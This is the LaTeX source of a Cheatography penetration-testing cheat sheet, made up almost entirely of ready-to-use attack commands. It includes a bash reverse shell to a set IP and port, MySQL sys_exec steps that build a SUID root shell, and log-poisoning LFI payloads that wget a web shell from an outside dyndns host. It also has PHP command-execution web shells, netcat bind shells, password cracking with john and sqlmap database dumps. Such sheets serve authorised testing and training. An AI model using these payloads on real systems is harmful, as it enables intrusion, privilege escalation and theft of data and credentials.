\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{vag\_mour} \pdfinfo{ /Title (pentesting.pdf) /Creator (Cheatography) /Author (vag\_mour) /Subject (Pentesting Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{54AAFF} \definecolor{LightBackground}{HTML}{E9F4FF} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Pentesting Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{vag\_mour} via \textcolor{DarkBackground}{\uline{cheatography.com/12578/cs/1414/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}vag\_mour \\ \uline{cheatography.com/vag-mour} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 12th May, 2016.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{3} \begin{tabularx}{5.377cm}{x{2.09034 cm} x{2.88666 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Enumeration}} \tn % Row 0 \SetRowColor{LightBackground} nmap 10.0.0.* & scanning for hosts \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{nast -m -i eth0} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{nmap -sV -p U:1-65535,T:1-65535 \textless{}IP\textgreater{}} \tn % Row Count 3 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{testtest} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{3.03597 cm} x{1.94103 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{BASH commands}} \tn % Row 0 \SetRowColor{LightBackground} cut -d" " -f2 & delimeter " " second field \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} find / -u root & find user files \tn % Row Count 3 (+ 1) % Row 2 \SetRowColor{LightBackground} echo "text" | sed 's/regex/e/' & replace with sed \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} bash -i \textgreater{}\& \seqsplit{/dev/tcp/192.168.1.88/6666} 0\textgreater{}\&1; & shell \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} find / -perm -4000 -type f 2\textgreater{}/dev/null & find SUID files \tn % Row Count 9 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{; or ` or | to execute commands as second argument} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.88666 cm} x{2.09034 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Sharing files without Apache}} \tn % Row 0 \SetRowColor{LightBackground} nc -w 5 -v -l -p 80 \textless{} file.ext & netcat share from 80 port \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} cd / \&\& python -m SimpleHTTPServer & python file share \tn % Row Count 4 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Mysql commands}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{logged in mysql as root \newline SELECT sys\_exec('touch /tmp/thisisatest'); \newline \newline int main() \newline \{ \newline setresuid(0, 0, 0); \newline setresgid(0, 0, 0); \newline system( "/bin/bash" ); \newline return 0; \newline \} \newline \newline SELECT sys\_exec('chown root.root /tmp/exploit'); \newline \newline SELECT sys\_exec('chmod +s,a+rwx /tmp/exploit'); \newline \newline -{}-{}-{}-{}-{}-{}- \newline select \seqsplit{load\_file('/etc/passwd')}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Password decryption}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{/pentest/passwords/john\#} john -{}-rules -{}-wordlist=/pentest/passwords/wordlists/darkc0de.lst -{}-users=aadams /root/de-ice/aa} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{./john /tmp/hash -{}-format=raw-md5} \tn % Row Count 4 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{echo \textless{}base64string\textgreater{} | base64 -{}-decode} \tn % Row Count 5 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{1.09494 cm} x{3.88206 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{LFI attack}} \tn % Row 0 \SetRowColor{LightBackground} php streams & \seqsplit{index.php?page=data://text/plain},\textless{}?php \seqsplit{system\%28\%22uname\%20-a\%22\%29;\%20}?\%3E \tn % Row Count 3 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{URL \seqsplit{http://blah/access.log\&cmd=ls} \newline \newline \newline error.log no links inside \newline http://blah/ {[}payload{]} encoded in url only \newline \newline telnet + user agent can be used \newline access.log or user agent \newline GET /\textless{}? exec('wget \seqsplit{http://h3ck.dyndns.org/ani.txt} -O shell.php');?\textgreater{} \newline \newline GET /\textless{} ?php phpinfo(); ? \textgreater{} \newline \newline -{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}-{}- \newline lfi + auth.log writable + ssh command execution \newline \newline ssh '\textless{}pre\textgreater{}\textless{}?php echo system(\$\_GET{[}"cmd"{]}); exit; ?\textgreater{}'@h3ck.dyndns.org \newline -{}-{}-{}-- \newline /proc/self/environ -\textgreater{} user agent \newline /proc/self/cmdline \newline /proc/self/fd/1,2,3..} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Php executing commands}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\textless{}?php system(\$\_REQUEST{[}'cmd'{]}); ?\textgreater{}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\textless{}? Php \$ handler = popen (\$ \_GET {[}'cmd'{]}, 'r'); \$ read = fread (\$ handler, 2096); echo \$ read;?\textgreater{}} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{wget -O /tmp/bd.php \textless{}url\_to\_malicious\_file\textgreater{} \&\& php -f /tmp/bd.php} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{functions exec, shell\_exec, passthru} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{Pseudo-terminal to real shell}} \tn % Row 0 \SetRowColor{LightBackground} \textasciicircum{}python -c 'import pty; pty.spawn("/bin/bash");'\textasciicircum{} & for exit pataw ctrl + v ctrl + c {[} enter{]} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} nc -l -p 6666 -e /bin/bash & nc IP 6666 \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{echo os.system('/bin/bash') \newline /bin/sh -i} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{p{0.4977 cm} p{0.4977 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{SQL injection}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{./sqlmap.py -u http://192.168.60.138 -{}-forms} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{5.377cm}}{./sqlmap.py -u http://192.168.60.138 -{}-forms -{}-risk=3 -{}-level=3 -{}-dbs} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{5.377cm}}{./sqlmap.py -u http://192.168.60.138 -{}-forms -{}-risk=3 -{}-level=3 -D members -{}-dump} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Wordlists \& Exploits}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{/pentest/passwords/john/password}.lst} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{/opt/framework/msf3/data/john/wordlists/password}.lst} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{http://wiki.skullsecurity.org/Passwords}} \tn % Row Count 4 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\textasciicircum{}cd \seqsplit{/pentest/exploits/exploitdb/} cat files.csv | grep -i wordpress | grep 1.5.1\textasciicircum{}} \tn % Row Count 6 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}